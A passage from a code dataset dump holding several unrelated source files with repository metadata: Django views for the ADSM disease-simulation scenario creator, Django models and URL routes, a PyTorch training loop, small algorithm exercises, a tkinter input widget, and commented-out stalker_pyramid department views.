Redirecting...\")\n return redirect('/setup/%s/new/' % model_name) # Population can be deleted, maybe others\n\n\ndef promote_to_abstract_parent(model_name):\n for key, value in abstract_models.items(): # fix for child models (DirectSpread, RelationalFunction) returning to the wrong place\n if model_name in [x[0] for x in value]:\n model_name = key\n return model_name\n\n\ndef trigger_list(request):\n layout = {\n 'Start Triggers':\n [DiseaseDetection,\n RateOfNewDetections,\n DisseminationRate,\n SpreadBetweenGroups,\n TimeFromFirstDetection,\n DestructionWaitTime],\n 'Stop Triggers':\n [StopVaccination],\n 'Restart Triggers': # Duplicate list from above because of filtering\n [DiseaseDetection,\n RateOfNewDetections,\n DisseminationRate,\n SpreadBetweenGroups,\n TimeFromFirstDetection,\n DestructionWaitTime],\n }\n context = {'title': \"Vaccination Triggers\",\n 'base_page': 'ScenarioCreator/VaccinationTriggerList.html',\n 'categories': [{'name':'Start Triggers',\n 'models':[filtered_list_per_model(x, False) for x in layout['Start Triggers']]\n },\n {'name':'Stop Triggers',\n 'models':[list_per_model(x) for x in layout['Stop Triggers']]\n },\n {'name':'Restart Triggers', # This exact name is used in the template VaccinationTriggerList.html\n 'models':[filtered_list_per_model(x, True) for x in layout['Restart Triggers']]\n }\n ]\n }\n \n return context\n\n\ndef vaccination_trigger_in_use(protocol):\n vaccination_triggers = trigger_list({}) # trigger_list never touches its request argument\n\n for category in vaccination_triggers['categories']:\n if category['name'] == \"Start Triggers\":\n for model in category['models']:\n if model['entries']: # a non-empty queryset means at least one start trigger exists\n if not protocol.use_vaccination:\n protocol.use_vaccination = True\n protocol.save()\n return True\n\n if protocol.use_vaccination:\n protocol.use_vaccination = False\n protocol.save()\n return False\n\n\ndef filtered_list_per_model(model_class, restart_trigger):\n model_name = model_class.__name__\n context = {'entries': model_class.objects.filter(restart_only=restart_trigger),\n 'class': model_name,\n 'name': spaces_for_camel_case(model_name)}\n return context\n\n\ndef list_per_model(model_class):\n model_name = model_class.__name__\n context = {'entries': model_class.objects.all(),\n 'class': model_name,\n 'name': spaces_for_camel_case(model_name),\n 'wiki_link': getattr(model_class, 'wiki_link', None)}\n return context\n\ndef functions_panel(request, form=None):\n \"\"\"Panel on the right that lists both Relational and Probability Functions with a graphic depiction\"\"\"\n context = {'models': [],\n 'load_target': '#current-function',\n }\n if form is not None:\n context['form'] = form\n for local_name, local_model in abstract_models['Function']:\n context['models'].append(list_per_model(local_model))\n return render(request, 'functions_panel.html', context) # no 3 panel layout\n\ndef export_relational_graph(request):\n\n # get the graph src; this looks a lot like a url, and is only used to extract the primary key of the graph\n graph_src = str(request.GET.get('graph_src', None))\n # extract said primary key. This is used as a unique identifier for each function\n graph_pk = int(''.join(char for char in graph_src if char.isdigit()))\n\n # get the object itself. 
This will actually only be used to get the exact name of the function\n rel_graph = ScenarioCreator.models.RelationalFunction.objects.get(pk=graph_pk)\n\n # get the graph object, this comes back as an HttpResponse, but the image is in HttpResponse.content as bytes\n graph = function_graphs.existing_relational_graph(graph_pk)\n\n # ensure that the path will exist (makedirs also creates the parent folder)\n os.makedirs(workspace_path(scenario_filename() + \"/Supplemental Output Files/Relational Function Graphs\"), exist_ok=True)\n\n # write the image to file.\n with open(workspace_path(scenario_filename() + \"/Supplemental Output Files/Relational Function Graphs/\" + rel_graph.name + \".png\"), \"wb\") as image_file:\n image_file.write(graph.content)\n\n # blank response - nothing happens on the front end.\n return JsonResponse({})\n\ndef export_pdf_graph(request):\n\n # get the graph src; this looks a lot like a url, and is only used to extract the primary key of the graph\n graph_src = str(request.GET.get('graph_src', None))\n # extract said primary key. This is used as a unique identifier for each function\n graph_pk = int(''.join(char for char in graph_src if char.isdigit()))\n\n # get the object itself. This will actually only be used to get the exact name of the function\n pdf_graph = ScenarioCreator.models.ProbabilityDensityFunction.objects.get(pk=graph_pk)\n\n # get the graph object, this comes back as an HttpResponse, but the image is in HttpResponse.content as bytes\n graph = function_graphs.existing_probability_graph(graph_pk)\n\n # ensure that the path will exist (makedirs also creates the parent folder)\n os.makedirs(workspace_path(scenario_filename() + \"/Supplemental Output Files/PDF Graphs\"), exist_ok=True)\n\n # write the image to file\n with open(workspace_path(scenario_filename() + \"/Supplemental Output Files/PDF Graphs/\" + pdf_graph.name + \".png\"), \"wb\") as image_file:\n image_file.write(graph.content)\n\n # blank response - nothing happens on the front end.\n return JsonResponse({})\n\ndef control_protocol_list(request):\n return model_list(request, 'ScenarioCreator/ControlProtocolList.html')\n\n\ndef model_list(request, base_page='ScenarioCreator/ModelList.html'):\n model_name, model = get_model_name_and_model(request)\n model_name = promote_to_abstract_parent(model_name)\n if model_name in 'Function RelationalFunction ProbabilityDensityFunction'.split():\n return functions_panel(request)\n if model_name == 'VaccinationTrigger': # special case\n context = trigger_list(request)\n else:\n context = {'title': \"Create \" + spaces_for_camel_case(model_name) + \"s\",\n 'base_page': base_page,\n 'models': []}\n if model_name in abstract_models.keys():\n for local_name, local_model in abstract_models[model_name]:\n context['models'].append(list_per_model(local_model))\n else:\n context['models'].append(list_per_model(model))\n context['load_target'] = '#center-panel'\n context['load_next'] = request.GET.get('next', '') # #704 Ability to load the center panel URL with a ?next=/setup/DirectSpread/1/ argument\n 
return render(request, 'ScenarioCreator/3Panels.html', context)\n\n# Utility views were moved to ADSMSettings/connection_handler.py\n\ndef open_population(request, target):\n from ADSMSettings.models import SmSession\n session = SmSession.objects.get()\n session.set_population_upload_status(\"Processing file\")\n\n return parse_population(workspace_path(target), session)\n\n\ndef upload_population(request):\n from ADSMSettings.models import SmSession\n session = SmSession.objects.get()\n if request.method == 'GET':\n json_response = {\"status\": session.population_upload_status, \"percent\": session.population_upload_percent*100}\n return JsonResponse(json_response)\n\n session.set_population_upload_status(\"Processing file\")\n if 'filename' in request.POST:\n file_path = workspace_path(request.POST.get('filename'))\n else:\n try:\n file_path = handle_file_upload(request, is_temp_file=True, overwrite_ok=True)\n except FileExistsError:\n return JsonResponse({\"status\": \"failed\",\n \"message\": \"Cannot import file because a file with the same name already exists in the list below.\"})\n\n return parse_population(file_path, session)\n\n\ndef parse_population(file_path, session):\n from xml.etree.ElementTree import ParseError\n try:\n model = Population(source_file=file_path)\n model.save()\n except Exception as error: # covers EOFError and ParseError without swallowing KeyboardInterrupt/SystemExit\n session.set_population_upload_status(status='Failed: %s' % error)\n message = \"This is not a valid Population file: \" if isinstance(error, ParseError) else \"\"\n return JsonResponse({\"status\": \"failed\", \"message\": message + str(error)}) # make sure to cast errors to string first\n # wait for Population parsing (up to 5 minutes)\n session.reset_population_upload_status()\n convert_user_notes_to_unit_id()\n return JsonResponse({\"status\": \"complete\", \"redirect\": \"/setup/Populations/\"})\n\ndef export_population(request, format):\n parser = ScenarioCreator.population_parser.ExportPopulation(format)\n parser.export()\n return redirect(\"/setup/Populations/\")\n\n\ndef filtering_params(request):\n \"\"\"Collects the list of parameters to filter by. Because of the way this is setup:\n 1) Only keys mentioned in this list will be used (security, functionality).\n 2) Only one filter for each choice key can be used (e.g. 
only one production_type__name)\"\"\"\n params = {}\n keys = ['latitude__gte', 'latitude__eq', 'latitude__lte', 'longitude__gte', 'longitude__eq',\n 'longitude__lte', 'initial_size__gte', 'initial_size__eq', 'initial_size__lte', # 3 permutations for each number field\n 'production_type__name', 'initial_state']\n if request:\n for key in keys:\n if key in request.GET:\n params[key] = request.GET.get(key)\n return params\n\n\ndef filter_info(request, params):\n \"\"\"Provides the information necessary for Javascript to fully construct a set of filters for Population\"\"\"\n info = {}\n # each select option\n info['select_fields'] = {'production_type__name': [x.name for x in ProductionType.objects.all()],\n 'initial_state': Unit.initial_state_choices}\n info['numeric_fields'] = [\"latitude\", \"longitude\", \"initial_size\"]\n info['remaining_filters'] = [x for x in info['select_fields'] if x not in params.keys()]\n return info\n\n\ndef population(request):\n \"\"\"Creates the formset and filter context for Population View\"\"\"\n context = {}\n FarmSet = modelformset_factory(Unit, extra=0, form=UnitFormAbbreviated, can_delete=False)\n if save_formset_succeeded(FarmSet, Unit, context, request):\n return redirect(request.path)\n if Population.objects.filter(id=1).exists():\n\n if not Unit.objects.count(): # #571 no units were imported: error, blank files\n Population.objects.all().delete()\n return population(request) # delete blank and try again\n\n sort_type = request.GET.get('sort_by', 'initial_state')\n query_filter = Q()\n params = filtering_params(request)\n for key, value in params.items(): # loops through params and stacks filters in an AND fashion\n query_filter = query_filter & Q(**{key: value})\n\n initialized_formset = FarmSet(queryset=Unit.objects.filter(query_filter).order_by(sort_type)[:100])\n context['formset'] = initialized_formset\n context['filter_info'] = filter_info(request, params)\n context['deletable'] = '/setup/Population/1/delete/'\n context['editable'] = request.GET.get('readonly', 'editable')\n context['population_file'] = os.path.basename(Population.objects.get().source_file)\n context['Population'] = Unit.objects.count()\n context['Farms'] = Unit.objects.count()\n else:\n context['xml_files'] = file_list([\".xml\", \".csv\"])\n return render(request, 'ScenarioCreator/Population.html', context)\n\n\ndef validate_scenario(request):\n\n # ensure that the destruction_reason_order includes all elements. 
See #990 for more details\n dg = DestructionGlobal.objects.all().first()\n if dg:\n DestructionGlobal.objects.filter(pk=1).update(destruction_reason_order=match_data(dg.destruction_reason_order, \"Basic, Trace fwd direct, Trace fwd indirect, Trace back direct, Trace back indirect, Ring\"))\n\n simulation = subprocess.Popen(adsm_executable_command() + ['--dry-run'],\n shell=(platform.system() != 'Darwin'),\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n stdout, stderr = simulation.communicate() # blocks until the dry run has processed the db and exited\n print(\"C Engine Exit Code:\", simulation.returncode)\n context = {'dry_run_passed': simulation.returncode == 0 and not stderr,\n 'sim_output': stdout.decode() + stderr.decode(),\n 'whole_scenario_warnings': whole_scenario_validation(),\n 'base_page': 'ScenarioCreator/Validation.html'}\n return render(request, 'ScenarioCreator/MainPanel.html', context)\n\n\ndef vaccination_global(request):\n instance = VaccinationGlobal.objects.get()\n initialized_form = VaccinationMasterForm(request.POST or None, instance=instance)\n if request.method == \"POST\":\n if initialized_form.is_valid():\n instance = initialized_form.save(commit=True)\n context = {\n 'title': 'Vaccination Global',\n 'ordering': json.loads(instance.vaccination_priority_order, object_pairs_hook=OrderedDict),\n 'form': initialized_form\n }\n\n return render(request, 'ScenarioCreator/VaccinationGlobal.html', context)\n\n\ndef destruction_global(request):\n\n instance = DestructionGlobal.objects.get()\n initialized_form = DestructionMasterForm(request.POST or None, instance=instance)\n if request.method == \"POST\":\n if initialized_form.is_valid():\n instance = initialized_form.save(commit=True)\n\n context = {\n 'title': 'Destruction Global',\n 'reasons': match_data(instance.destruction_reason_order, \"Basic, Trace fwd direct, Trace fwd indirect, Trace back direct, Trace back indirect, Ring\").split(\",\"),\n 'priorities': instance.destruction_priority_order.split(\",\"),\n 'form': initialized_form,\n }\n '''\n #Destruction Priority Secondary Priority\n 'priorities': json.loads(json.dumps(match_data(str(instance.destruction_priority_order), '{\"Days Holding\":[\"Oldest\", \"Newest\"], \"Production Type\":[], \"Size\":[\"Largest\", \"Smallest\"]}')), object_pairs_hook=OrderedDict),\n '''\n\n return render(request, 'ScenarioCreator/DestructionGlobal.html', context)\n\n\ndef match_data(current, all_data):\n\n def try_dict(current_dict, all_data_dict):\n if \"{\" in current_dict and \"{\" in all_data_dict:\n try:\n try:\n all_data_dict = json.loads(all_data_dict, object_pairs_hook=OrderedDict)\n except ValueError:\n return None\n except SyntaxError:\n return current_dict\n try:\n current_dict = json.loads(current_dict, object_pairs_hook=OrderedDict)\n except ValueError:\n return None\n except SyntaxError:\n return all_data_dict\n if isinstance(current_dict, dict):\n for key in all_data_dict:\n current_dict.setdefault(key, all_data_dict[key])\n return current_dict\n except ValueError:\n return None\n\n dict_return = try_dict(current, all_data)\n if dict_return is not None:\n return dict_return\n\n was_string = False\n if isinstance(current, str):\n was_string = True\n current = current.replace(\", \", \",\").split(\",\")\n all_data = all_data.replace(\", \", \",\").split(\",\")\n\n for element in all_data:\n if element not in current:\n current.append(element)\n for element in list(current): # iterate over a copy; removing from the list being iterated would skip elements\n if element not in all_data:\n 
current.remove(element)\n\n if was_string:\n current = \",\".join(current)\n\n return current\n","repo_name":"NAVADMC/ADSM","sub_path":"ScenarioCreator/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":51536,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"67"} +{"seq_id":"33951320214","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\nclass UserLogin(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n gender = models.CharField(max_length=10, default=\"\")\n datetime = models.DateTimeField(auto_now_add=True)\n is_active = models.BooleanField(default=True)\n mobile = models.CharField(max_length=100, default='')\n profession = models.CharField(max_length=100, default=\"\")\n field = models.CharField(max_length=100, default='')\n bio = models.TextField(max_length=1000, default=\"Create your Community\") # Changed from TimeField to TextField\n profile = models.ImageField(null=True, default='static/download.jpeg', upload_to='static/') # Removed the comma after upload_to\n\n def __str__(self):\n return f\"{self.user.first_name} {self.user.last_name}\"\n\nclass postUser(models.Model):\n creator = models.ForeignKey(User, on_delete=models.CASCADE)\n threads = models.CharField(max_length=100)\n descriptions = models.TextField(max_length=100)\n groupMembers = models.IntegerField(default = 1)\n timeCreated = models.DateTimeField(auto_now=True)\n def __str__(self):\n return f\"{self.threads}\"\n\nclass Discussion(models.Model):\n thread = models.ForeignKey(postUser, on_delete=models.CASCADE)\n comments = models.TextField(max_length=100000)\n writers = models.ForeignKey(User, on_delete=models.CASCADE)\n images = models.ImageField(null=True, blank=True ,upload_to='static/')\n def __str__(self):\n return f\"{self.thread}\"\nclass other(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n name = models.CharField(max_length = 100)\n","repo_name":"tolossamuel/hackatonsBIT","sub_path":"students/community/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"29049922245","text":"import torch\nimport torch.nn.functional as F\n\nimport os\nfrom utils import AverageMeter, calculate_accuracy, calculate_class_num, save_checkpoint\nfrom plot_results import plot_confusion_matrix, plot_roc_curve\n\n\ndef train(model, criterion, optimizer, scheduler, train_loader, test_loader, num_epochs, device, cfg, label_dict):\n\n best_test_acc = 0\n best_epoch = 0\n\n for epoch in range(1, num_epochs+1):\n\n losses = AverageMeter()\n accuracies = AverageMeter()\n model.train()\n\n print(f'Starting training on epoch {epoch} / {num_epochs}')\n\n all_targets_list = []\n\n for i, (inputs, targets) in enumerate(train_loader):\n inputs, targets = inputs.to(device), targets.long().to(device)\n outputs = model(inputs)\n loss = criterion(outputs, targets)\n \n all_targets_list.append(targets)\n acc = calculate_accuracy(outputs, targets)\n\n losses.update(loss.item(), inputs.size(0))\n accuracies.update(acc, inputs.size(0))\n \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n scheduler.step()\n \n if i % 30 == 0:\n print('Epoch: [{0}][{1}/{2}]\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Acc {acc.val:.3f} ({acc.avg:.3f})'.format(epoch, i + 1, len(train_loader), loss=losses, acc=accuracies))\n \n all_targets = torch.cat(all_targets_list, 
dim=0).tolist()\n calculate_class_num(all_targets, label_dict, 'train')\n\n if epoch % 5 == 0:\n save_checkpoint(cfg.TRAIN.CHECKPOINT_PATH, epoch, model, optimizer)\n\n lr = scheduler.get_last_lr()[0]\n print('Epoch: {0}\\t'\n 'Lr: {1}\\t'\n 'Train Loss {2}\\t'\n 'Train Acc {3}'.format(epoch, lr, losses.avg, accuracies.avg))\n\n test_acc = test(model, test_loader, device, label_dict)\n if test_acc > best_test_acc:\n best_test_acc = test_acc\n best_epoch = epoch\n print(\"save best checkpoint\")\n print('------------------------------------------------------------')\n save_checkpoint(cfg.TRAIN.CHECKPOINT_PATH, epoch, model, optimizer, \"best\")\n \n print('best epoch: {}, best test acc: {}'.format(best_epoch, best_test_acc))\n\n\ndef val(epoch, model, criterion, dataloader, device):\n\n print('validation at epoch {}'.format(epoch))\n\n losses = AverageMeter()\n accuracies = AverageMeter()\n\n model.eval()\n\n with torch.no_grad():\n for _, (inputs, targets) in enumerate(dataloader):\n inputs, targets = inputs.to(device), targets.long().to(device)\n outputs = model(inputs)\n loss = criterion(outputs, targets)\n acc = calculate_accuracy(outputs, targets)\n losses.update(loss.item(), inputs.size(0))\n accuracies.update(acc, inputs.size(0))\n\n print('Epoch: {0}\\t'\n 'Val Loss {1}\\t'\n 'Val Acc {2}'.format(epoch, losses.avg, accuracies.avg))\n\n\ndef test(model, dataloader, device, label_dict):\n accuracies = AverageMeter()\n accuracies_top3 = AverageMeter()\n\n model.eval()\n all_targets_list = []\n all_outputs_list = []\n\n with torch.no_grad():\n for _, (inputs, targets) in enumerate(dataloader):\n inputs, targets = inputs.to(device), targets.long().to(device)\n outputs = model(inputs)\n acc = calculate_accuracy(outputs, targets)\n acc3 = calculate_accuracy(outputs, targets, topk=3)\n accuracies.update(acc, inputs.size(0))\n accuracies_top3.update(acc3, inputs.size(0))\n all_targets_list.append(targets)\n all_outputs_list.append(outputs)\n \n all_targets = torch.cat(all_targets_list, dim=0).tolist()\n all_scores = torch.cat(all_outputs_list, dim=0)\n all_outputs = torch.argmax(all_scores, dim=1).tolist()\n calculate_class_num(all_targets, label_dict, 'test')\n plot_confusion_matrix(all_targets, all_outputs, label_dict)\n plot_roc_curve(all_targets, all_scores, label_dict)\n \n print(f'Test Top1 Acc: {accuracies.avg}, Test Top3 Acc: {accuracies_top3.avg}')\n print('------------------------------------------------------------')\n return accuracies.avg\n","repo_name":"ddz16/video-classification","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"515303403","text":"# One pass of partitioning splits the data into two independent parts, where every element of one part\n# is smaller than every element of the other; each part is then quick-sorted the same way, recursively,\n# until the whole sequence is in order.\n\nlist=[2,-4,699,23,1,-9,6,7,88] #mid=23 left=[2,-4,1,-9,6,7] 23 right=[699,88]\n# firstTime=[2,-4,1,-9,6,7] + [23] + [699,88]\n# secondTime=[-4,-9] + [1] + [2,6,7] + [23] + [88, 699]\n# thirdTime=[-9,-4,1,2,6,7,23,88,699]\ndef quickSort(list):\n if len(list) >= 2:\n mid = list[len(list)//2]\n left, right = [], []\n list.remove(mid) # remove one occurrence of the pivot; duplicates of it fall into the left part\n for num in list:\n if num > mid:\n right.append(num)\n else:\n left.append(num)\n return quickSort(left) + [mid] + quickSort(right)\n else:\n return 
list\n\n\nprint(quickSort(list))\n\n","repo_name":"sammazhao/moocClassSelenium","sub_path":"QuikSortDemo.py","file_name":"QuikSortDemo.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"19478194783","text":"import sys\n\n\ninput = lambda: sys.stdin.readline().rstrip()\n\ndef solution():\n def find(num):\n if parent[num] < 0:\n return num\n\n parent[num] = find(parent[num]) # path compression: point directly at the root\n return parent[num]\n\n def union(a, b):\n parent_a = find(a)\n parent_b = find(b)\n if parent_a == parent_b:\n return\n\n # union by rank: a more negative parent value marks the taller tree\n if parent[parent_a] < parent[parent_b]:\n parent[parent_b] = parent_a\n elif parent[parent_a] > parent[parent_b]:\n parent[parent_a] = parent_b\n else:\n parent[parent_a] -= 1\n parent[parent_b] = parent_a\n\n n, m = map(int, input().split())\n parent = [-1] * (n + 1)\n\n answer = []\n\n for _ in range(m):\n command, a, b = map(int, input().split())\n if command:\n if find(a) == find(b):\n answer.append('YES')\n else:\n answer.append('NO')\n else:\n union(a, b)\n\n return '\\n'.join(answer)\n\n\nprint(solution())","repo_name":"UntitledCrew/Weekly","sub_path":"2021_year/1_month/5_week/Soomin/Algorithm/1717_집합의_표현.py","file_name":"1717_집합의_표현.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"5838999008","text":"import tkinter as tk\nfrom tkinter import messagebox\nfrom theme import Theme\nfrom tooltip import CreateTooltip\n\nclass CreateFloatInput(object):\n \"\"\"Creates labels and entries for defining a float\"\"\"\n\n def __init__(self, root, theme, label_text, vertical_offset = 0, tooltip_text = \"\", default_entry = 0):\n # Root\n self.root = root\n \n # Theme\n self.theme = theme\n\n # Vertical offset\n self.vertical_offset = vertical_offset\n\n # Default entry\n self.default_entry = default_entry\n\n # Header\n label = tk.Label(root, text = label_text, foreground = self.theme.foreground, background = self.theme.background, font = self.theme.font)\n self.label_x = 20\n self.label_y = vertical_offset\n self.label_height = 20\n label.place(x = self.label_x, y = self.label_y, height = self.label_height)\n self.label = label\n\n if (tooltip_text != \"\"):\n tooltip = CreateTooltip(label, tooltip_text)\n\n # Create entry\n entry = tk.Entry(self.root, background = self.theme.background, foreground = self.theme.foreground, font = self.theme.font, insertbackground = self.theme.foreground)\n entry.insert(2, self.default_entry)\n self.entry_x = 190\n self.entry_y = vertical_offset\n self.entry_height = 20\n entry.place(x = self.entry_x, y = self.entry_y, height = self.entry_height, width = 60)\n self.entry = entry\n\n def show(self):\n self.label.place(x = self.label_x, y = self.label_y, height = self.label_height)\n self.entry.place(x = self.entry_x, y = self.entry_y, height = self.entry_height)\n\n def hide(self):\n self.label.place(x = 0, y = 0, height = 0)\n self.entry.place(x = 0, y = 0, height = 0)\n\n def getentry(self):\n entry = None\n try:\n entry = float(self.entry.get())\n except ValueError: # float() rejects non-numeric input\n messagebox.showerror(\"Invalid Input\", \"Ensure inputs are valid\")\n return entry\n ","repo_name":"joebinns/vector-field-generator","sub_path":"floatinput.py","file_name":"floatinput.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"71871098452","text":"\"\"\"\nThis file holds LeetCode problems from 剑指Offer (Sword to Offer / Coding Interviews).\n\"\"\"\nfrom 
datastructure import *\n\n\ndef getIntersectionNode(headA: ListNode, headB: ListNode) -> ListNode:\n \"\"\"\n Offer 52: given two linked lists, return their first shared node, or null if there is none.\n Key ideas: two pointers, equal combined path lengths, both become None at the same time\n \"\"\"\n p1, p2 = headA, headB\n\n # Neat: if the lists never intersect, both pointers reach None together and the loop ends\n while p1 != p2:\n p1 = p1.next if p1 else headB\n p2 = p2.next if p2 else headA\n\n return p1\n\n\ndef search(nums, target):\n \"\"\"\n Offer 53: count how many times a number appears in a sorted array\n \"\"\"\n cnt = 0\n for e in nums:\n if e == target:\n cnt += 1\n return cnt","repo_name":"CSU-NXY/leetcode_py","sub_path":"offer.py","file_name":"offer.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"36517693115","text":"\"\"\"sistemaGestionRoyal URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.conf.urls import url, include\nfrom rest_framework import routers # add this\nfrom sistema import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\n#router = routers.DefaultRouter() # add this\n#router.register(r'Alumnos', views.AlumnoSerializer, 'Alumnos')\n\nurlpatterns = [\n url(r'^', include('sistema.urls')), # the APIs\n path('admin/', admin.site.urls),\n path('', views.inicio, name='inicio'),\n path('logout', views.logoutUser, name='logout'),\n path('home/', views.base, name='home'),\n path('consulta_a/', views.consultar_a, name='consultar_a'),\n path('royalApp/', views.royalAppPassword, name='royalApp'),\n path('royalApp/', views.modalAlumnos, name='royalApp'),\n path('consulta_a/', views.modalAlumnos),\n path('consulta_d/', views.consultar_d, name='consultar_d'),\n path('consulta_d/', views.modalDocentes),\n path('certificados/', views.certificados, name='certificados'),\n path('certificados//', views.modalcertificadoscombos),\n path('certificados/eliminar/', views.modalcertificados),\n path('curso/', views.curso, name='cursos'),\n path('curso//', views.modalCursos),\n path('aula/', views.aula, name='aula'),\n path('aula//', views.modalAulas),\n path('grupos/', views.grupos, name='grupos'),\n path('grupos//', views.modalgrupos),\n path('grupos////', views.moverAlumnos),\n path('gruposAulas////', views.moverAulas),\n path('pagos/', views.pagos, name='pagos'),\n path('pagos//', views.modalPagos),\n path('registro/', views.modalPagos),\n path('registro//', views.modalPagos),\n path('promociones/', views.promociones, name='promociones'),\n path('promociones//', views.modalpromociones),\n path('pagos_d/', views.pagos_d, name='pagos_d'),\n path('pagos_d//', views.modalPagosD),\n path('ventas/', views.ventas, name='ventas'),\n path('libros/', views.libros, name='libros'),\n path('libros//', views.modalLibros),\n path('inventario/', views.inventario, name='inventario'),\n path('inventario//', views.modalProducto),\n path('caja/', views.caja, name='caja'),\n path('cajacierre/', views.cajacierre, name='cajacierre'),\n 
path('historialVentas/', views.historialVentas, name='historialVentas'),\n path('caja//', views.modalDetalleVenta)\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)\n urlpatterns += static(settings.STATIC_URL,document_root=settings.STATIC_ROOT)","repo_name":"ReynosoJesus/SistemaRoyal","sub_path":"sistemaGestionRoyal/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13217507611","text":"from pyramid.view import view_config, view_defaults\nfrom stalker import Department\n\nimport logging\n\nfrom stalker_pyramid.views.entity import EntityViews, simple_entity_interpreter\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.WARNING)\n\n\n# @view_config(\n# route_name='create_department'\n# )\n# def create_department(request):\n# \"\"\"creates a new Department\n# \"\"\"\n#\n# logger.debug('***create department method starts ***')\n#\n# logged_in_user = get_logged_in_user(request)\n#\n# # get params\n# came_from = request.params.get('came_from', '/')\n# name = request.params.get('name')\n#\n# logger.debug('new department name : %s' % name)\n#\n# if name:\n# description = request.params.get('description')\n#\n# lead_id = request.params.get('lead_id', -1)\n# lead = User.query.filter_by(id=lead_id).first()\n#\n# # Tags\n# tags = get_tags(request)\n#\n# logger.debug('new department description : %s' % description)\n# logger.debug('new department lead : %s' % lead)\n# logger.debug('new department tags : %s' % tags)\n#\n# try:\n# new_department = Department(\n# name=name,\n# description=description,\n# created_by=logged_in_user,\n# tags=tags\n# )\n#\n# # create a new Department_User with lead role\n# lead_role = query_role('Lead')\n# dpu = DepartmentUser(\n# department=new_department,\n# user=lead,\n# role=lead_role\n# )\n#\n# DBSession.add(new_department)\n# DBSession.add(dpu)\n#\n# logger.debug('added new department successfully!')\n#\n# request.session.flash(\n# 'success:Department %s is created '\n# 'successfully!' % name\n# )\n#\n# logger.debug('***create department method ends ***')\n#\n# except BaseException as e:\n# request.session.flash('error: %s' % e)\n# HTTPFound(location=came_from)\n# else:\n# logger.debug('not all parameters are in request.params')\n# log_param(request, 'name')\n# response = Response(\n# 'There are missing parameters: '\n# 'name: %s' % name, 500\n# )\n# transaction.abort()\n# return response\n#\n# response = Response('successfully created %s department!' 
% name)\n# return response\n#\n#\n# @view_config(\n# route_name='update_department'\n# )\n# def update_department(request):\n# \"\"\"updates an Department\n# \"\"\"\n#\n# logger.debug('***update department method starts ***')\n#\n# logged_in_user = get_logged_in_user(request)\n#\n# # get params\n# came_from = request.params.get('came_from', '/')\n# department_id = request.matchdict.get('id', -1)\n# department = Department.query.filter_by(id=department_id).first()\n#\n# name = request.params.get('name')\n#\n# logger.debug('department : %s' % department)\n# logger.debug('department new name : %s' % name)\n#\n# if department and name:\n#\n# description = request.params.get('description')\n#\n# lead_id = request.params.get('lead_id', -1)\n# lead = User.query.filter_by(id=lead_id).first()\n#\n# # Tags\n# tags = get_tags(request)\n#\n# logger.debug('department new description : %s' % description)\n# logger.debug('department new lead : %s' % lead)\n# logger.debug('department new tags : %s' % tags)\n#\n# # update the department\n# department.name = name\n# department.description = description\n#\n# department.lead = lead\n# lead_role = query_role('Lead')\n# # get the current department lead\n# dpu = DepartmentUser.query\\\n# .filter(DepartmentUser.department == department)\\\n# .filter(DepartmentUser.role == lead_role)\\\n# .first()\n# if not dpu:\n# dpu = DepartmentUser(\n# department=department,\n# user=lead,\n# role=lead_role\n# )\n# DBSession.add(dpu)\n# else:\n# dpu.user = lead\n#\n# department.tags = tags\n# department.updated_by = logged_in_user\n# department.date_updated = datetime.datetime.now()\n#\n# DBSession.add(department)\n#\n# logger.debug('department is updated successfully')\n#\n# request.session.flash(\n# 'success:Department %s '\n# 'is updated successfully' % name\n# )\n#\n# logger.debug('***update department method ends ***')\n# else:\n# logger.debug('not all parameters are in request.params')\n# log_param(request, 'department_id')\n# log_param(request, 'name')\n# HTTPServerError()\n#\n# return Response('Successfully updated department: %s' % department_id)\n#\n#\n# @view_config(\n# route_name='get_departments',\n# renderer='json'\n# )\n# def get_departments(request):\n# \"\"\"returns all the departments in the database\n# \"\"\"\n# return [\n# {\n# 'id': dep.id,\n# 'name': dep.name\n# }\n# for dep in Department.query.order_by(Department.name.asc()).all()\n# ]\n#\n#\n# @view_config(\n# route_name='get_department',\n# renderer='json'\n# )\n# def get_department(request):\n# \"\"\"returns all the departments in the database\n# \"\"\"\n# department_id = request.matchdict.get('id', -1)\n# department = Department.query.filter_by(id=department_id).first()\n#\n# return[\n# {\n# 'id': 